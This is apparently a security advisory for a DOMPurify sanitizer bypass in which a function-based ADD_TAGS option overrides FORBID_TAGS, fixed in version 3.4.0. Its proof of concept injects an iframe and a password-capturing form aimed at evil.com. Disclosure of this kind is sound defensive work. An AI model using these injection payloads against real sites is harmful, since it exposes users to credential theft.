GHSA-h7mw-gpvr-xq4m

Source

https://github.com/advisories/GHSA-h7mw-gpvr-xq4m

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-h7mw-gpvr-xq4m/GHSA-h7mw-gpvr-xq4m.json

JSON Data

https://api.test.osv.dev/v1/vulns/GHSA-h7mw-gpvr-xq4m

Aliases

CVE-2026-41240

Downstream

MINI-42pm-x8wv-jhvm

MINI-63v6-83mp-xjjf

MINI-hf94-3pxv-p44m

MINI-jj2w-g8c3-wp74

MINI-jwxq-j82w-c47f

MINI-vfv9-xwcw-p7hj

Related

CGA-v322-x3mp-57w9

Published

2026-04-22T17:34:17Z

Modified

2026-05-05T16:42:34.505849Z

Severity

6.0 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N CVSS Calculator

Summary

DOMPurify: FORBID_TAGS bypassed by function-based ADD_TAGS predicate (asymmetry with FORBID_ATTR fix)

Details

There is an inconsistency between FORBIDTAGS and FORBIDATTR handling when function-based ADD_TAGS is used.

Commit c361baa added an early exit for FORBID_ATTR at line 1214:

/* FORBID_ATTR must always win, even if ADD_ATTR predicate would allow it */
if (FORBID_ATTR[lcName]) {
  return false;
}

The same fix was not applied to FORBIDTAGS. At line 1118-1123, when EXTRAELEMENTHANDLING.tagCheck returns true, the short-circuit evaluation skips the FORBIDTAGS check entirely:

if (
  !(
    EXTRA_ELEMENT_HANDLING.tagCheck instanceof Function &&
    EXTRA_ELEMENT_HANDLING.tagCheck(tagName)  // true -> short-circuits
  ) &&
  (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName])  // never evaluated
) {

This allows forbidden elements to survive sanitization with their attributes intact.

PoC (tested against current HEAD in Node.js + jsdom):

const DOMPurify = createDOMPurify(window);

DOMPurify.sanitize(
  '<iframe src="https://evil.com"></iframe>',
  {
    ADD_TAGS: function(tag) { return true; },
    FORBID_TAGS: ['iframe']
  }
);
// Returns: '<iframe src="https://evil.com"></iframe>'
// Expected: '' (iframe forbidden)

DOMPurify.sanitize(
  '<form action="https://evil.com/steal"><input name=password></form>',
  {
    ADD_TAGS: function(tag) { return true; },
    FORBID_TAGS: ['form']
  }
);
// Returns: '<form action="https://evil.com/steal"><input name="password"></form>'
// Expected: '<input name="password">' (form forbidden)

Confirmed affected: iframe, object, embed, form. The src/action/data attributes survive because attribute sanitization runs separately and allows these URLs.

Compare with FORBID_ATTR which correctly wins:

DOMPurify.sanitize(
  '<p onclick="alert(1)">hello</p>',
  {
    ADD_ATTR: function(attr) { return true; },
    FORBID_ATTR: ['onclick']
  }
);
// Returns: '<p>hello</p>' (onclick correctly removed)

Suggested fix: add FORBID_TAGS early exit before the tagCheck evaluation, mirroring line 1214:

/* FORBID_TAGS must always win, even if ADD_TAGS predicate would allow it */
if (FORBID_TAGS[tagName]) {
  // proceed to removal logic
}

This requires function-based ADDTAGS in the config, which is uncommon. But the asymmetry with the FORBIDATTR fix is clear, and the impact includes iframe and form injection with external URLs.

Reporter: Koda Reef

Database specific

{
    "nvd_published_at": "2026-04-23T16:16:26Z",
    "github_reviewed": true,
    "severity": "MODERATE",
    "cwe_ids": [
        "CWE-183",
        "CWE-79"
    ],
    "github_reviewed_at": "2026-04-22T17:34:17Z"
}

References

Affected packages

npm / dompurify

Package

Name: dompurify; View open source insights on deps.dev
Purl: pkg:npm/dompurify

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

3.4.0

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-h7mw-gpvr-xq4m/GHSA-h7mw-gpvr-xq4m.json"